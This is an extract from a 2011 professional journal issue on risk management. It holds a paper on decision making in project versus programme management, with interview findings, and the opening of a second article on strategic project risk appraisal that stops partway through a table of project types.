Groningen, the Netherlands: University of Groningen.
Download at: <http://www.debee.nl>, 2011.
[2] The Standish Group International. Chaos: A Recipe for
Success, 1999. Retrieved from <http://www.
standishgroup.com/sample_research/index.php>,
(21.06.07).
[3] Royal Academy of Engineering The Challenges of
Complex IT Projects, 2004. Retrieved from <http://
www.raeng.org.uk/news/publications/list>, (19.06.07).
[4] M.T. Pich, C.H. Loch, A. de Meyer. On Uncertainty,
Ambiguity and Complexity in Project Management.
Management Science 48(8), 1008–1023, 2002.
[5] E. Kutsch, M. Hall. Intervening conditions on the management of project risk: Dealing with uncertainty in
information technology projects. International Journal
of Project Management 23(8), 591–599, 2005.
[6] B. Flyvbjerg, N. Bruzelius, W. Rothengatter. Megaprojects
and Risk – An Anatomy of Ambition. Cambridge, UK:
Cambridge University Press, 2003.
[7] C. Besner, B. Hobbs. The perceived value and potential contribution of project management practices to
project success. Project Management Journal 37(3),
37–48, 2006.
[8] Project Management Institute. A guide to the project management body of knowledge (PMBOK®). Newtown
Square, PA: Author, 2008.
[9] R.J. Voetsch, D.F. Cioffi, F.T. Anbari. Project risk management practices and their association with reported
project success. In: Proceedings of 6th IRNOP Project
Research Conference, Turku, Finland, August 25-27,
2004.
[10] Office of Government Commerce. Managing Successful Projects with PRINCE2. Norwich, UK: The Stationary Office, 2009.
[11] T. Williams. Assessing and moving on from the dominant project management discourse in the light of
project overruns. IEEE Transactions on Engineering
Management 52(4), 497-508, 2005.
[12] N. Agarwal, U. Rathod. Defining “success” for software projects: An exploratory revelation. International
Journal of Project Management 24(4), 358–370, 2006.
[13] J. Habermas. The Theory of Communicative Action –
Reason and the Rationalization of Society. Boston, MA:
Beacon Press, 1984.
[14] Association for Project Management (APM). Project
Risk Analysis and Management Guide. Buckinghamshire, UK: Author, 2004.
[15] K.E. Weick, K.M. Sutcliffe. Managing the Unexpected.
New York, NY: Wiley, 2007.
Farewell Edition
© Novática
Risk Management
Decision-Making:
A Dialogue between Project and Programme Environments
Manon Deguire
This paper proposes to revisit and examine the underlying thought processes which have led to our present state of DM
knowledge at project and programme levels. The paper presents an overview of the Decision Making literature, observations and comments from practitioners and proposes a DM framework which may lead to empowering project and programme managers in the future.
1 Decision Making
Author
"Decision-making is considered to be the most crucial
part of managerial work and organizational functioning."
Mintzberg in [2 p.829]
According to some definitions, a decision is an allocation of resources. For others, it can be likened to writing a
cheque and delivering it to the payee. It is irrevocable, except that a new decision may reverse it. Similarly, the decision maker who has authority over the resources being allocated makes a decision. Presumably, he/she makes the
decision in order to further some objective, which he/she
hopes to achieve by allocating the resources [1].
Different definitions of what a decision is and involves
abound in literature that spreads through the knowledge of
many centuries of all disciplines [2]. Decision Making (DM)
is very important to most companies and modern organizational definitions can be traced back to von Neuman and
Morgenstein in 1947 [3], who developed a normative decision theory from the mathematical elaboration of the utility
theory applied to economic DM. Their approach was deeply
rooted in sixteenth century probability theory, has persisted
until today and can be found relatively intact in present decision analysis models such as those defined under the linear decision processes. This well-known approach uses
probability theory to structure and quantify the process of
making choices among alternatives. Issues are structured
and decomposed to small decisional levels, and re-aggregated with the underlying assumption that many good small
decisions will lead to a good big decision. Analysis involves
putting each fact in consequent order and deciding on its
respective weight and importance.
Although most descriptive research in the area of DM
concludes that humans tend to use both an automatic nonconscious thought process as well as a more controlled one
when making decisions [4], the more controlled approach
to DM remains the most important trend in both theoretical
and practical models of DM. However, this dual thought
process is possible because of the human mind’s capability
to create patterns from facts and experiences, store them in
© Novática
Farewell Edition
Manon Deguire is a Managing Partner and founder of Valense
Ltd., a PMI Global Registered Education Provider, which offers
consultancy, training and research services in value, project,
programme, portfolio and governance management. She has 25
years work experience in the field of Clinical and Organizational
Psychology in Canada, the USA, UK and Europe and has
extensive experience in teaching, as well as in project and
programme management. From 1988 to 1996 Manon held a fulltime academic post at McGill University (Montreal) which
included both teaching at graduate and undergraduate levels as
well as being the programme Manager for the Clinical Training
Program (P&OT), Faculty of Medicine. Her responsibilities
involved heading and monitoring all professional development
projects as well as accreditation processes for over than 120
‘McGill Affiliated’ hospital departments. Although Manon
relocated to London in 1996, her more recent North American
experience includes being actively involved in PMI® activities.
More specifically, she was Director-at-Large of Professional
Development for the Education Special Interest Group from 2004
to 2006 and has been a member of the Registered Educational
Providers Advisory Group since 2005. Her responsibilities in
this role involve presenting and facilitating activities for REPAG
events worldwide. She is also a regular speaker at PMI®
Congresses in the US and abroad, as well as PMI® Research
Conferences and PMI® Chapter events. More recently she has
initiated a working relationship with the Griffin Tate Group in
the US and completed their ‘train the trainer’ course. She is an
Adjunct Professor with the Lille Graduate School of
Management and conducts research on Decision-Making in
project and programme environments. Her ongoing involvement
in academia and her experience as a practitioner with
multinational organizations and multicultural groups give her a
unique understanding of both the theory and practice of projectbased organizations in general and project management in particular. She regularly teaches both PMP® and CAPM®
Certification courses. Manon is currently finishing a PhD in
Projects, Programs and Strategy at the ESC Lille School of
Management (France), she holds a Masters degree in Clinical
Psychology from University of Montreal (CA) and a Masters
degree in Organizational Psychology from Birkbeck College in
London (UK). She is a certified PMP® and also holds both
Prince2 Practitioner and MSP Advanced Practitioner
certifications (UK). <[email protected]>
CEPIS UPGRADE Vol. XII, No. 5, December 2011
67
Risk Management
“
The paper presents
an overview of the
Decision Making literature,
observations and comments
from practitioners
”
the registers of long-term memory and re-access them in
the course of assessing and choosing options. Many authors
refer to this mechanism as "intuitive DM" a term that has
not gained much credibility in the business environment and
is still looked down upon by many decision analysts.
Given the years during which modern Project Management was developed (as well as other management trends),
it is not surprising to find that the more controlled, linear
mechanistic approach to DM permeates its literature and
the project context seems to have neglected the importance
of the softer and/or more qualitative aspects of the management domain that are now being recognized as essential for
good business to develop. Therefore, in the new context of
projects and programmes, quantitative aspects of the DM
process are progressively becoming secondary issues to such
qualitative issues as the meaningfulness of a decision for
different stakeholders and for the overall organization.
Project managers are repetitively expected to listen to
different stakeholders’ needs and account for the numerous
qualitative and quantitative variables when making decisions, however, both information overload and organizational constraints usually make this difficult to implement
and very little guidance can be found in the project literature. If anything, the overwhelming importance of the DM
issue seems rather accepted as common knowledge for
project managers as it is not mentioned or explored in the
PMBOK® Guide [5] or in other popular project approaches
despite the bulk of recent research and growing interest in
this domain. In spite of the increasing importance placed on
DM knowledge and skills, many project and programme
managers continue to struggle with the concept that can stand
in the way of career progression and may be one of the primary factors preventing project and programme success.
Project management practice is permeated with the
thought that in order to facilitate DM in the project context,
simple (linear) evaluation tools should be widely used. However, it has now long been documented that these decisionsupport tools are no longer sufficient when project managers’ roles have grown to accommodate the ever-changing
complexity of the business environment. This situation has
added considerably to the number of variables and the dimensions of an already complex web of relationships brought
about by the stakeholder focus. With such changes as the
implementation of Project Management Offices, Portfolio
Management, Program Management and Project-Based Or-
68
CEPIS UPGRADE Vol. XII, No. 5, December 2011
ganizations, project managers are now called upon to interact with an ever-expanding pool of stakeholders and other
tools, such as meetings, reports and electronic networks
which are also important. Intuition, judgment and vision
have become essential for successful strategic project and
programme management.
Without an appropriate framework, some authors have
suggested that managers do not characteristically solve
problems but only apply rules and copy solutions from others [6]. Managers do not seem to use new decision-support
tools that address potential all-encompassing sector-based
elements, such as flexibility, organizational impact, communication and adaptability, nor technological and employee developments. There is therefore a potential for
managerial application of new, value creation decision-support tools. Because these are not mature tools, in the first
instance they might be introduced in a more qualitative way
– ‘a way of thinking’, as suggested in [7], to reduce the
managerial skepticism. Recent decision-support tools might
be fruitfully combined with traditional tools to address critical elements and systematize strategic project management.
It is now a well-accepted fact that traditional problemsolving techniques are no longer sufficient as they lead to
restrictive, linear Cartesian conclusions on which decisions
were usually based in the past. Instead, practitioners need
to be able to construct and reconstruct the body of knowledge according to the demands and needs of their ongoing
practice [8]. Reflecting, questioning and creating processes
must gain formal status in the workplace [9].
In [10] it is implied that management is a series of DM
processes and assert that DM is at the heart of executive
activity in business. In the new business world, decisions
need to be made fast and most often will need to evolve in
time. However, most of the research is based on a traditional linear understanding of the DM process. In this linear model, predictions are made about a known future and
decisions are made at the start of a project, taking for
granted that the future will remain an extension of the past.
2 DM at Project Level
The commonly accepted definition of a project as a
unique interrelated set of tasks with a beginning, an end
and a well defined outcome [5] assumes that everyone can
identify the tasks at the outset, provide contingency alternatives, and maintain a consistent project vision throughout the course of the project [11]. The ‘performance paradigm’ [12][13] used to guide project management holds true
only under stable conditions or in a time-limited, changelimited, context [14][15]. This is acceptable as long as, by
definition, the project is a time-limited activity, and for the
sake of theoretical integrity, is restricted to "the foreseeable future."
The traditional DM model has provided project managers with a logical step-by-step sequence for making a decision. This is typical of models proposed in the decisionmaking literature of corporate planning and management
science of the past. It describes how decisions should be
Farewell Edition
© Novática
Risk Management
made, rather than how they are made. The ability of this
process to deliver best decisions rests upon the activities
that make up the process and the order in which they are
attended to. In this framework, the process of defining a
problem is similar to making a medical diagnosis, the performance gap becomes a symptom of problems in the organization’s health and identification of the problem is followed by a search for alternative solutions. The purpose of
this phase of the decision-making process is to seek the best
solution [16, Ch. 1]. Several authors have identified a basic
structure, or shared logic, underlying how organizations and
decision-makers handle decisions. Three main decisionmaking phases can be defined: Identification by which situations that require a decision-making response come to be
recognized, Development involving two basic routines (a
search routine for locating ready-made solutions and a design routine to modify or develop custom made solutions)
and Selection with its three routines (screening, evaluationchoice and authorization) [17].
3 DM at Programme Level
More recently, many organizations have felt a need to
further develop towards a fully projectised structure, which
goes beyond a simple portfolio approach and involves the
management of strategic decisions through programmes
[18][19]. This move has somewhat shifted the responsibilities and decision-making roles of project and programmes
managers. At this level, several projects needs to be managed together in order to create synergies and deliver benefits to the organization rather than delivering a specific
product or service in isolation and in most organizations
programme managers are actively working within a paradox. They have an official role in a legitimate control system (project level), facilitating an integrated transactional
change process, and simultaneously participate in a shadow
system in which no one is in control [20].
A mechanistic style of management warranting a more
rational and linear approach to DM is appropriate when goals
are clear and little uncertainty exists in the prevailing environment [11][21]. programme management practice is not
meant to replace this management focus; rather, it encompasses it in a larger context. Here, managers cannot control
their organization to the degree that the mechanistic perspective implies, but they can see the direction of its evolution [22]. When several variables are added to a system or
when the environment is changed, the relationships quickly
“
A Decision Making framework
is proposed which may lead
to empowering project and
programme managers
in the future
”
© Novática
Farewell Edition
lose any resemblance to linearity [23]. This has been raised
by many authors in reference to strategic issues such as the
organization’s competitive position, the achievement of the
programme’s benefits and the effects of changes on the programme business case [24][25]. These same issues have traditionally been processed through a project view of change
control rather than a strategic view of change management
with one of the main drawbacks being that these standard
approaches focus on a linear programme lifecycle [26][27].
According to these authors, focus on early definition and
control of scope severely restricts flexibility thus negating
the value of having a programme. Furthermore, insistence
on a rigid life cycle intrinsically limits the ability of the
programme to adapt in response to evolving business strategy [26].
When studying the implementation of strategic projects,
Grundy [25] found that cognitive, emotional and territorial
themes were so intrinsically interwoven to the decisionmaking process that he suggested using the concept of "muddling through" originally introduced by Lindblom in 1959
[28]. Similarly unsatisfied with the rational model of decision-making at top management levels, Isenberg stated in
[29] that managers "rely heavily on a mix of intuition and
disciplined analysis" and "might improve their thinking by
combining rational analysis with intuition, imagination and
rules of thumb" (p.105).
Much of the literature concerning decision-making at
higher management levels seems to manifest perplexity and
more questions than answers. By increasing our knowledge
in this domain and providing an appropriate framework,
project and programme managers might find material to
reflect and possibly enhance their skills to better fit each
environment.
4 Discovering Project and Programme Level
Views
Beer [30] felt that most organizational research was irrelevant to practitioners because practitioners worked in a
world of chaos and complex systems, whereas research was
still about simple and equilibrated systems operated by researchers who maintain their objectivity. In order to respond
to such concerns, this research project was set in a participatory paradigm [31] and uses a mix of observation and
semi-structured interviews. The interview questions are
based on the theoretical framework that was developed from
the literature review and designed to capture the complex
web of thought processes leading to decisions. The main
objective was to uncover characteristics of linear and nonlinear decision situations at project and programme levels.
All respondents were either project or programme managers and had a good understanding of the differences between these roles and responsibilities.
Project managers typically described their working environment as consisting of "the team of people on the
project" and DM activities involved either these specific
people or the project specific tasks and goals. DM analysis
was often restricted to project level variables and remained
CEPIS UPGRADE Vol. XII, No. 5, December 2011
69
Risk Management
“
Decision Making is very important to most companies
confined to the scope limits and constraints of the project.
On the other hand, as this example clearly demonstrates,
one programme manager described her work environment
from an organizational point of view and her discourse was
not programme specific: "The programme manager has to
relate not only to the different projects involved in the programme, but also to the organization in terms of people (horizontal and vertical relationships) as well as the short, medium and long term strategy". This view was also coherent
with how project managers in our study perceive the programme managers’ roles and responsibilities.
Programme managers were described as seeing things
from above implying that the thought processes used at their
level of analysis is different than those useful to oversee
one project. The general impression is one of managing many
ongoing concurrent decisions rather than a sequenced series of bounded decisions. A typical response from a project
manager describing the programme management role was:
"programme managers look down from above at different
projects and need to pace several projects and the resources
involved in groups of projects together." When describing
her own role, one programme manager states: "developing
strategic goals that are in line with the governance is really
important, that’s one part of the job. Then figuring out how
to deliver that strategy is the other part."
Project managers speak of themselves and are referred
to by programme managers as dealing with single projects
and having to make more sequenced isolated decisions (technical, human related…). Decisions at this level are referred
to as being more independent from one another and
sequenced in time. One decision is followed by resolution
until another decision has to be made. Each decision is more
discrete in nature (technical, human resource, procurement
related) whereas programme decisions are often interrelated,
covering many areas simultaneously.
One project manager described his work in the following way: "My projects have a beginning and an end. I am
involved mainly in engineering projects at the moment and
they have specific finish dates." A programme manager’s
descriptions of the project manager’s role was that "a project
manager deals more precisely with things like budgets and
constraints of the project that they are in charge of, they
seem to operate within specific parameters." The vocabulary used to describe decisions at the project level was generally more precise and specific.
”
Both project and programme managers feel that DM
activities occupy a major part of their day or time at work.
It was extremely difficult for both groups of respondents to
evaluate the number of decisions taken in the course of any
fixed period of time (day, month…). A typical response from
one project manager illustrates this when he says: "I would
say I can spend the better part of my nine hours at work
making decisions, from small ones like deciding to change
activity or big ones like for example a large screen project
[…] this could mean making hundreds of decisions per day."
Similarly, one programme manager states that "A great deal
of time is devoted to decision making activities at the beginning of the programme, perhaps 100% of my time gets
devoted to it at this phase as I am looking at things like
risks involved."
Although it was difficult for both project and programme
managers to quantify the time spent on DM activities or the
number of decisions involved in their work, their subjective evaluations all converged to say that they felt they spent
a great deal of time in DM activities.
Both groups also feel that in the initial phase of the
project or programme, they spend almost all their time
making and taking decisions. This was described as an acute
DM time. Later phase decisions seem to focus on more specific issues for project managers; either described as technical or human relation issues. programme managers mention the technical issues sporadically and mainly in the context of understanding what is going on. But unlike project
managers, technical versus human resources is not one of
the important dichotomies in the themes of their DM discourse. When technical DM was discussed it was usually
in terms of grasping a better understanding of what people
actually did, the skills or appropriate environment to enhance their performance, but not to actually solve the technical problem at hand or to make any decision about it.
When questioned about the use of specific DM tools
one project manager spontaneously described the traditional
rational method of DM: "When the problem is purely a technical one, it is easy in a way because we have tools to measure what is going on like oscilloscopes and things. Even if
it looks like a complicated problem with thousands of cables, then we look at the symptoms and we come up with a
diagnosis often this is based just on our experience of similar problems [...] We have a discussion on how to go about
it, how to measure it, we cut the problem in half and we
“
Practitioners need to be able to construct
and reconstruct the body of knowledge according
to the demands and needs of their ongoing practice
70
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© Novática
Risk Management
Figure 1: Decision-Making Model in Projects.
again look at the symptoms. So, in a way, in the decision
making process we breakdown the problem to something
that we can observe or measure." This description could
have been taken from a number of DM texts that are concerned with the way decisions should be made. In fact, for
project managers, most purely technical decisions seem to
follow the traditional DM model, breaking down into more
manageable small decisions and exploring alternatives
against each other. However, even in this group, many state
that few decisions are purely technical and say that most
decisions involve a human component that varies in impor-
tance. The importance of this aspect ranges from at least
equal to out-weighting the technical aspect. Together with
the traditional DM breakdown process, experience is usually mentioned as a key factor of the DM process.
Contrary to the discourse held by project managers, there
are no such straightforward textbook answers from programme managers. This could be simply symptomatic of
the sample; however, programme managers describe an iterative ongoing process of information gathering in order
to make sense of holistic situations. One programme manager saw herself as constantly gathering information in or-
Figure 2: Model DM in Programmes.
© Novática
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
71
Risk Management
“
Three main
decision-making phases
can be defined: Identification,
Development and Selection
”
der to organize it in a cohesive way. Talking about the programme she is presently involved in, she described the process in the following words: "It involves many different people at different levels and I need to set time aside to understand exactly what is going on. Then, I will need to get back
to them and formulate how it all fits in together, but I need
to give myself some time to get my head around it."
5 Discussion
The data analysis shows that project managers seem to
have a natural predisposition toward using a more traditional and structured approach to DM. This observation can
be accounted for in more than one way and the research
method employed does not enable the establishment of
causal relationships. The difference could be caused by the
nature of their roles and responsibilities or that people who
have personal affinities for this type of DM approach tend
to be attracted to this type of work. Further psychological
testing would be necessary to establish this second type of
relationship. Nevertheless, project managers have described
logical step-by-step sequences that could actually have been
used as examples for the typical models proposed in the
DM literature such as those described in [16] and [17]. Although critics of this approach have outlined the fact that
the ability of this process to deliver best decisions rests upon
the activities that make up the process and the order in which
they are attended to, the project managers interviewed seem
comfortable with, and skilled at, using this method to resolve problems.
Within this DM model, project managers also tend to
use a process of deductive reasoning more often than programme managers that have described processes of inductive reasoning as a preferential thought process when engaged in DM activities. Aristotle, Thales and Pythagoras
first described deductive reasoning around 600 to 300 B.C.
This is the type of reasoning that proceeds from general
principles or premises to derive particular information
(Merriam-Webster). It is characteristic of most linear DM
tools used in the context of high certainty. These tools are
aimed at achieving an optimal solution to a problem that
has been modeled with two essential requirements:
a) Each of the variables involved in the decision-making process behaves in a linear fashion and
b) The number of feasible solutions is limited by constraints on the solution.
These tools rely almost entirely on the logic and basic
underlying assumptions of statistical analysis, regression
analysis, past examples and the linear expectations and pre-
72
CEPIS UPGRADE Vol. XII, No. 5, December 2011
dictions they stimulate. A good example is the story of Aristotle who is said to have told of how Thales used predictive logic to deduct, from accumulated historical data, that
the next season’s olive crop would be a very large one and
bought all the olive presses, making a fortune in the process. However, given that deductive reasoning is dependent
on its premises, a false premise can lead to a false result. In
the best circumstances, results from deductive reasoning
are typically qualified as non-false conclusions such as: "All
humans are mortal. Paul is a human è Paul is mortal".
From the project managers’ perspective, the project’s
basic assumptions and constraints are the starting premises
for all further decisional processes. In fact, these initial conditions of the project environment act as limits or boundaries, necessary for this type of DM process to be effective.
Project managers generally feel that most large decisions
are actually made during the first phases of the project, before and during the planning stage. Project management
typically delivers outputs in the form of products and services and most project decisions are made to commit to the
achievement of these specific outputs [32]. This perspective infers that a series of small decisions that amount to
the project plan, are made during the planning phase and
finally add up to what is referred to as a large decision: the
approved project plan. All these decisions, that shape the
project, are made at the onset of the project. All later decisions are considered less important, more specific, and
aimed at problem solving; often limited to one domain of
knowledge at a time (i.e. technical, human relations…).
Because most large decisions have been made at the onset,
once the scope is defined, it limits the number of possible
dependant variables in the DM process. The number of significant stakeholders involved is also limited and the overall situation is described as limited to the project’s immediate environment. Much of the DM follows a relatively traditional structured model to which the deductive thought
process seems to adapt readily. Figure 1 illustrates this DM
model for projects.
6 Programme Management Framework
A particularly interesting finding is the fact that deductive reasoning does not seem quite as popular or as universally called for in the DM processes of the programme managers we interviewed. However, the use of inductive reasoning seems more popular than for project managers. De-
“
Contrary to the discourse
held by project managers,
there are no such
straightforward textbook
answers from
programme managers
”
Farewell Edition
© Novática
Risk Management
“
DM processes at project
and programme level differ
significantly in the timing,
pacing and number of major
decisions, as well as the
nature of the DM
processes employed
”
ductive reasoning applies general principles to reach specific conclusions, whereas inductive reasoning examines
specific information, perhaps many pieces of specific information, to derive a general principle.
A well known example of this type of thought process is
found in the story of Isaac Newton. By observation and thinking about phenomena such as how apples fall and how the
planets move, he induced the theory of gravity. In much the
same way, programme managers relate stories about having
to collect information through observation, questions and
numerous exchanges in order to put the pieces together into
a cohesive story to manage the programme. The use of Analogy (plausible conclusion) is often apparent in the programme managers’ discourse. This process uses comparisons such as between the atom and the solar system and the
DM process is then based on the solutions of similar past
problems, intuition or what is often referred to as experience. Contrary to project management where most decisions
are taken to commit to the achievement of specific outputs,
programme management typically delivers outcomes in the
form of benefits and business case decisions are taken over
longer periods of time depending on the number of projects
that are progressively integrated to the programme and to
the timing scale of these different projects [32].
These decisions increasingly commit an organization to
the achievement of the outcomes or benefits and the DM
period, although important at the beginning continues progressively as the situation evolves to accommodate the
changes in this larger environment. Typical responses from
programme managers tend to converge toward an ongoing
series of large decisions (affecting the totality of entire
projects) as the programme evolves over time. This can be
compared to the project level discourse that described large
decisions at the onset and smaller ones (not affecting the
overall business case of the project) as the project evolved.
This is in keeping with the fact that, since programmes deliver benefits as opposed to specific products or services,
the limits of the programme environment are not as specific
or as clearly defined as those for the project. Organizational
benefits are inherently linked to organizational strategy, value
systems, culture, vision and mission. This creates an unbounded environment and basic assumptions are not as clear
as for the project environment. This could account for the
© Novática
Farewell Edition
fact that deductive thought processes are less suited than
inductive ones in the DM processes of programme managers.
7 Conclusion
Both project and programme managers were unanimous
in recognizing the importance and the amount of time spent
in decision-making activities and that further knowledge is
needed in this domain.
It would seem that a more mechanistic style of management warranting a more rational and linear approach to decision making is appropriate when goals are clear and little
uncertainty exists in the prevailing environment. The timelimited definition of projects makes them well adapted to
this performance paradigm.
These observations do not aim to lessen the requirements for traditional DM, but highlight the fact that programme management DM practice encompasses a larger
context. Here, managers cannot control their organizations
to the degree that the mechanistic perspective implies, but
have to develop an awareness of their future evolution. The
implications are readily felt at the decisional level; when
several variables are added to a system or when the environment is changed and relationships quickly lose any semblance of linearity.
Finally, this dialog has highlighted the fact that the DM
processes at project and programme level differ significantly
in the timing, pacing and number of major decisions, as
well as the nature of the DM processes employed. Most
large or important project decisions are bound by the
project’s basic assumptions and project managers tend to
have a preference for deductive mental processes when
making decisions. The occurrence of large or important programme decisions seems to persist throughout the programme life cycle as they are prompted by setting the assumptions for each project when these kick off. Because
the programme delivers benefits and that these cannot be
as clearly defined as products or services its environment
is not as clearly defined or bound by set basic assumptions
and inductive reasoning seems more suited to meet the programme managers’ decision making needs.
References
[1] T. Spradlin. A Lexicon of Decision Making,
DSSResources.COM, 03/05/2004. Extracted from:
<http://dssresources.com/papers/features/spradlin/
spradlin03052004.html> on 12 Jan 2007.
[2] R.B. Sambharya. Organizational decisions in multinational corporations: An empirical study. International
Journal of Management, 11, 827-838, 1994.
[3] J. von Neuman, O. Morgenstein. Theory of games and
economic behavior. Princeton, NJ: Princeton University Press, 1947.
[4] R. Hastie, M. Dawes. Rational Choice in an Uncertain
World. Thousand Oaks: CA: Sage Publications, Inc.,
2001.
[5] PMI. A Guide to the Project Management Body of
CEPIS UPGRADE Vol. XII, No. 5, December 2011
73
Risk Management
Knowledge (PMBOK® Guide) – 4th ed., 2008.
[6] James G. March. How decisions happen in organization. Human-Computer Interaction, 6(2), 95-117, 1991.
[7] M. Amram, N.. Real Options: Managing Strategic Investment in an Uncertain World (1st ed.). Boston, Massachusetts: Harvard Business School Press, 1999.
[8] D.A. Schön. Educating the Reflective Practitioner. London: Jossey-Bass, 1987.
[9] C. Bredillet. Knowledge management and organizational learning. In P.W.G. Morris & J.K. Pinto (Eds.),
The Wiley project management resource book. New
York, NY: John Wiley and Sons, 2004.
[10] R.M. Cyert, H.A. Simon, D.B. Trow,. Observations of
a business decision. The Journal of Business, 29(4),
237-248, 1956. [23] M. Beer. Why management research findings are unimplementable: An action science perspective. Reflections, The SoL MIT Press-Society for Organizational Learning Journal on Knowledge, Learning and Change, 2(3), 58-65, 2001.
[11] M.T. Pich, C.H. Loch, A. de Meyer. On Uncertainty,
Ambiguity, and Complexity in Project Management.
Management Science, Vol. 48, No. 8 (Aug., 2002),
1008-1023.
[12] M. Thiry. Combining value and project management
into an effective programme management model. International Journal of Project Management, (Special
Issue April 2002; 20-3, 221-228, and Proceedings of
the 4th Annual Project Management Institute-Europe
Conference [CD ROM].
[13] M. Thiry. The development of a strategic decision management model: An analytic induction research process based on the combination of project and value management. Proceedings of the 2nd Project Management
Institute Research Conference, 482-492, 2002.
[14] Standish Group International. The CHAOS Report ,
1994. Retrieved 25 Feb 2000 from <http://www.
standishgroup.com/sample_research/chaos_1994_
1.php>.
[15] KPMG. "What went wrong? Unsuccessful information
technology projects", 1997. Retrieved 10 Mar. 2000
from <http://audit.kpmg.ca/vl/surveys/it_wrong.htm>.
[16] D. Jennings. Strategic decision making. In D. Jennings
& S. Wattam (Eds.), Decision making An integrated
approach (2nd ed, pp. 251-282). Harlow, UK: Prentice
Hall Pearson, 1998.
[17] H. Mintzberg, D. Rasinghani, A. Theoret. The structure of "unstructured" decision processes, Administrative Science Quarterly, June 1976, 246-275.
[18] T.J. Moore. An evolving program management maturity model: Integrating program and project management. Proceedings of the Project Management Institute’s 31st Annual Seminars & Symposium Proceedings, 2000 [CD-ROM].
[19] D. Richards. Implementing a corporate programme
office. Proceedings of the 4th Project Management Institute-Europe Conference, 2001 [CD-ROM]. [20] P.
Shaw. Intervening in the shadow systems of organiza-
74
CEPIS UPGRADE Vol. XII, No. 5, December 2011
tions: consulting from a complexity perspective. Journal of Organizational Change Management, 10(3),
235-250, 1997.
[20] P. Shaw. Intervening in the shadow systems of organizations: consulting from a complexity perspective.
Journal of Organizational Change Management, 10(3),
235-250, 1997.
[21] PMCC. A Guidebook of Project and Program Management for Enterprise Innovation (P2M)-Summary
Translation, Revised Edition. Project Management
Professionals Certification Center, Japan, 2002.
[22] M. Santosus. Simple, Yet Complex, CIO Entreprise
Magazine, April 15, 1998. Retrieved 20 Jan. 2004 from
<http://www.cio.com/archive/enterprise/041598_
qanda.html>. Interview of R. Lewin and B. Regine
based on their book "Soul at Work: Complexity Theory
and Business" (published in 2000 by Simon &
Schuster).
[23] J.W. Begun. Chaos and complexity frontiers of organization science. Journal of Management Inquiry, 3(4),
329-335, 1994.
[24] M. Görög, N. Smith. Project Management for Managers, Project Management Institute, Sylva, NC, 1999.
[25] T. Grundy. Strategic project management and strategic behaviour. International Journal of Project Management, 18, 93-103, 2000.
[26] M. Lycett, A. Rassau, J. Danson. Programme management: a critical review. International Journal of project
Management, 22:289-299, 2004.
[27] M. Thiry. FOrDAD: A Program Management LifeCycle Process. International Journal of Project Management, Elseveir Science, Oxford (April, 2004) 22(3);
245-252.
[28] C.E. Lindblom. The science of muddling through. Public Administration Review, 19, 79-88, 1959.
[29] D.J. Isenberg. How senior managers think. Havard
Business Review, Nov/Dec, 80, 1984.
[30] M. Beer. Why management research findings are
unimplementable: An action science perspective. Reflections, The SoL MIT Press-Society for Organizational Learning Journal on Knowledge, Learning and
Change, 2(3), 58-65, 2001.
[31] J. Heron, P. Reason. A participatory inquiry paradigm.
Qualitative Inquiry, 3: 274-294, 1997.
[32] OGC. Managing Successful Programmes. Eighth Impression. The Stationery Office. London, 2003.
Farewell Edition
© Novática
Risk Management
Decisions in an Uncertain World:
Strategic Project Risk Appraisal
Elaine Harris
This article is developed from the author’s book on strategic project risk appraisal [1] and her special report on project
management for the ICAEW [2]. The book is based on over eight years of research in the area of risk and uncertainty in
strategic decision making, including a project funded by CIMA [3] and explores the strategic level risks encountered by
managers involved in different types of project. The special report classifies these using the suits from a pack of cards. This
article illustrates the key risks for three types of project including IT projects and suggests how managers can deal with
these risks. It makes a link between strategic analysis, risk assessment and project management, offering a new approach
to thinking about project risk management.
Keywords: Decisions, Managerial Judgement, Project
Appraisal, Risk, Uncertainty.
1 Investing in Projects in an Uncertain World
Projects are often thought of as a sequence of activities
with a life cycle from start to finish. One of the biggest
problems at or before the start is being able to foresee the
end, at some time in the future. Uncertainty poses a range
of issues for project planning and risk assessment. If we
think of projects as temporary endeavours, not all outcomes
may be measurable by the end, where lasting benefits may
be desirable. This provides the problem of how we judge
projects to be successful. Performance of projects has typically been measured by the three constraints of time, money
and quality. Whilst it may be easy to ascertain whether a
project is delivered on time and within budget, it is harder
to assess quality, especially when a project is first delivered. Many projects, even those that were famously late and
well over budget like the Sydney Opera House, can become
icons in society and be perceived as very successful after a
longer period of time. The classic issue in project management is that only a small minority of projects achieve success in all three measures, so academics have been searching for better ways to measure the success of projects, which
involves unpicking ‘quality’, and in whose eyes projects
are perceived to succeed or fail [2].
All strategic decisions that select which projects an organisation should invest in are taken without certain knowledge of what the future will hold and how successful the
“
This article illustrates
the key risks for three types of
project including IT projects
and suggests how managers
can deal with these risks
”
© Novática
Farewell Edition
Author
Elaine Harris is Professor of Accounting and Management and
Director of the Business School at the University of Roehampton
in London, United Kingdom. She is author of Gower Publishing’s
Strategic Project Risk Appraisal and Management and Managing
Editor of Emerald’s Journal of Applied Accounting Research
(JAAR). She chairs the Management Control Association
(MCA), a network of researchers working in the area of control
systems and human behaviour in organisations. <Elaine.Harris@
roehampton.ac.uk>
project will be. Faced with this uncertainty, we can attempt
to predict the factors that can impact on a project. Once we
can identify these factors and their possible impacts we can
call them risks and attempt to analyse and respond to them.
Risks can be both positive, such as embedded opportunities, perhaps to do more business with a new client or customer in future, or negative, things that can go wrong, and
those indeed require more focus in most risk management
processes. Project risk assessment should begin before the
organisation makes its decision about whether to undertake a project, or if faced with several options, which alternative to choose.
One common weakness in the approach that organisations take to project risk management is the failure to identify the sources of project risk early enough, before the organisation commits resources to the project (appraisal
stage). Another is not to share that risk assessment information with project managers so that they can develop suitable risk management strategies. Through action research
in a large European logistics company, a new project risk
assessment technique (Pragmatix®) has been developed to
overcome these problems. It provides an alternative method
for risk identification, ongoing risk management, project
review and learning. This technique has been applied to
eight of the most common types of projects that organisations experience.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
75
Risk Management
Type of project
1. IT/systems dev’t
Characteristics
Advanced technology manufacturing or new
information systems
2. Site or
relocation
New building or site, relocation or site development
3. Business
acquisition
Takeovers and mergers of all or part of another
business
4. New product
dev’t
Innovation, R & D, new products or services in
established markets
5. Change e.g.
closure
Decommissioning, reorganisation or business process
redesign
6. Business dev’t
New customers or markets, may be defined by
invitation to tender
7. Compliance
New legislation or professional standards, e.g. health
& safety
8. Events
Cultural, performing arts or sporting events, e.g.
Olympics
Suit
